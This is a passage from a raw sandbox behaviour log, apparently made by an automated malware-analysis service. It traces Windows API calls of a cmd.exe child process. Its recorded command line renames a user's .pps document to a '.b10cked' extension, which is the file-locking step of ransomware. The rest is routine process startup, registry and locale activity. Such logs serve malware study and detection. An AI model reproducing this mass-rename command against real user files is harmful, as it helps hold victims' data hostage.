lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x32, lpOverlapped=0x0) returned 1 [0234.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.720] _close (_FileHandle=4) returned 0 [0234.720] FindNextFileW (in: hFindFile=0x4e0e90, lpFindFileData=0x30f5d4 | out: lpFindFileData=0x30f5d4) returned 0 [0234.720] GetLastError () returned 0x12 [0234.720] FindClose (in: hFindFile=0x4e0e90 | out: hFindFile=0x4e0e90) returned 1 [0234.720] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0234.721] _close (_FileHandle=3) returned 0 [0234.721] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.721] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.721] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.721] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.721] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.721] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.722] SetConsoleInputExeNameW () returned 0x1 [0234.722] GetConsoleOutputCP () returned 0x1b5 [0234.722] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.722] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.722] exit (_Code=0) Process: id = "627" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16740" os_pid = "0x990" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" 
os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34978 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34979 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 34980 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 34981 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 34982 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34983 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34984 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34985 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34986 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffd6000" filename = "" Region: id = 34987 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35378 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35379 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35380 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 35381 start_va = 0x280000 end_va = 0x2e6fff entry_point = 0x280000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35382 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 35383 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35384 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35385 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35386 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35387 start_va = 0x76a90000 end_va = 
0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35388 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35389 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35390 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35391 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35392 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 35393 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35394 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35395 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 35396 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 35397 start_va = 0x170000 end_va = 0x170fff entry_point = 
0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 35398 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 35399 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 35400 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 35401 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 867 os_tid = 0xa60 [0234.980] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f914 | out: lpSystemTimeAsFileTime=0x12f914*(dwLowDateTime=0xbf8600e0, dwHighDateTime=0x1d440a9)) [0234.980] GetCurrentProcessId () returned 0x990 [0234.980] GetCurrentThreadId () returned 0xa60 [0234.980] GetTickCount () returned 0x40868 [0234.980] QueryPerformanceCounter (in: lpPerformanceCount=0x12f90c | out: lpPerformanceCount=0x12f90c*=29176898564) returned 1 [0234.980] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.980] __set_app_type (_Type=0x1) [0234.980] __p__fmode () returned 0x76b331f4 [0234.980] __p__commode () returned 0x76b331fc [0234.980] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.981] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.981] GetCurrentThreadId () returned 0xa60 [0234.981] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa60) returned 0x38 [0234.981] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.981] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.981] SetThreadUILanguage 
(LangId=0x0) returned 0x409 [0234.981] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.981] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f8a4 | out: phkResult=0x12f8a4*=0x0) returned 0x2 [0234.981] VirtualQuery (in: lpAddress=0x12f8db, lpBuffer=0x12f874, dwLength=0x1c | out: lpBuffer=0x12f874*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.981] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f874, dwLength=0x1c | out: lpBuffer=0x12f874*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.981] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f874, dwLength=0x1c | out: lpBuffer=0x12f874*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.981] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f874, dwLength=0x1c | out: lpBuffer=0x12f874*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.981] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f874, dwLength=0x1c | out: lpBuffer=0x12f874*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.981] GetConsoleOutputCP () returned 0x1b5 [0234.981] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.982] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.982] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.982] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.982] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0234.982] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.982] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.982] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.982] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.982] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.982] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.982] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.982] GetEnvironmentStringsW () returned 0x190208* [0234.983] FreeEnvironmentStringsW (penv=0x190208) returned 1 [0234.983] GetEnvironmentStringsW () returned 0x190208* [0234.983] FreeEnvironmentStringsW (penv=0x190208) returned 1 [0234.983] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e814 | out: phkResult=0x12e814*=0x40) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x0, lpData=0x12e820*=0x98, lpcbData=0x12e818*=0x1000) returned 0x2 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x1, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x0, lpData=0x12e820*=0x1, lpcbData=0x12e818*=0x1000) returned 0x2 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x0, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: 
hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x40, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x40, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x0, lpData=0x12e820*=0x40, lpcbData=0x12e818*=0x1000) returned 0x2 [0234.983] RegCloseKey (hKey=0x40) returned 0x0 [0234.983] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e814 | out: phkResult=0x12e814*=0x40) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x0, lpData=0x12e820*=0x40, lpcbData=0x12e818*=0x1000) returned 0x2 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x1, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x0, lpData=0x12e820*=0x1, lpcbData=0x12e818*=0x1000) returned 0x2 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x0, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, 
lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x9, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x4, lpData=0x12e820*=0x9, lpcbData=0x12e818*=0x4) returned 0x0 [0234.983] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e81c, lpData=0x12e820, lpcbData=0x12e818*=0x1000 | out: lpType=0x12e81c*=0x0, lpData=0x12e820*=0x9, lpcbData=0x12e818*=0x1000) returned 0x2 [0234.983] RegCloseKey (hKey=0x40) returned 0x0 [0234.983] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.983] srand (_Seed=0x5b8863c2) [0234.983] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked\"" [0234.983] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked\"" [0234.984] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.984] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x191968, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.984] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.984] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 
0x35 [0234.984] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.984] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.984] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.984] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.984] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.984] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.984] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.984] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.984] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.984] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.984] GetEnvironmentStringsW () returned 0x192358* [0234.985] FreeEnvironmentStringsW (penv=0x192358) returned 1 [0234.985] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.985] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.985] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.985] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.985] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.985] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.985] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.985] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.985] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.985] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.985] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f5e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.985] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, 
lpBuffer=0x12f5e0, lpFilePart=0x12f5dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f5dc*="Desktop") returned 0x18 [0234.985] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.985] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f35c | out: lpFindFileData=0x12f35c) returned 0x1909e8 [0234.985] FindClose (in: hFindFile=0x1909e8 | out: hFindFile=0x1909e8) returned 1 [0234.985] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f35c | out: lpFindFileData=0x12f35c) returned 0x1909e8 [0234.985] FindClose (in: hFindFile=0x1909e8 | out: hFindFile=0x1909e8) returned 1 [0234.985] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f35c | out: lpFindFileData=0x12f35c) returned 0x1909e8 [0234.986] FindClose (in: hFindFile=0x1909e8 | out: hFindFile=0x1909e8) returned 1 [0234.986] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.986] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.986] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.986] GetEnvironmentStringsW () returned 0x190208* [0234.986] FreeEnvironmentStringsW (penv=0x190208) returned 1 [0234.986] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.986] GetConsoleOutputCP () returned 0x1b5 [0234.986] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.986] GetUserDefaultLCID () returned 0x409 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f720, cchData=128 | out: lpLCData="0") returned 2 [0234.987] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f720, cchData=128 | out: lpLCData="0") returned 2 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f720, cchData=128 | out: lpLCData="1") returned 2 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.987] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.987] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.988] GetConsoleTitleW (in: lpConsoleTitle=0x180928, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.988] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.988] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.988] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.988] GetProcAddress 
(hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.989] _wcsicmp (_String1="move", _String2=")") returned 68 [0234.989] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0234.989] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0234.989] _wcsicmp (_String1="IF", _String2="move") returned -4 [0234.989] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0234.989] _wcsicmp (_String1="REM", _String2="move") returned 5 [0234.989] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0234.992] GetConsoleTitleW (in: lpConsoleTitle=0x12f418, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.993] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0234.993] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0234.993] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0234.993] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0234.993] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0234.993] _wcsicmp (_String1="move", _String2="CD") returned 10 [0234.993] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0234.993] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0234.993] _wcsicmp (_String1="move", _String2="REN") returned -5 [0234.993] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0234.993] _wcsicmp (_String1="move", _String2="SET") returned -6 [0234.993] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0234.993] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0234.993] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0234.993] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0234.993] _wcsicmp (_String1="move", _String2="MD") returned 11 [0234.993] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0234.993] _wcsicmp (_String1="move", _String2="RD") returned -5 [0234.993] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0234.993] _wcsicmp (_String1="move", 
_String2="PATH") returned -3 [0234.993] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0234.993] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0234.993] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0234.993] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0234.993] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0234.993] _wcsicmp (_String1="move", _String2="VER") returned -9 [0234.993] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0234.993] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0234.993] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0234.993] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0234.993] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0234.993] _wcsicmp (_String1="move", _String2="START") returned -6 [0234.993] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0234.993] 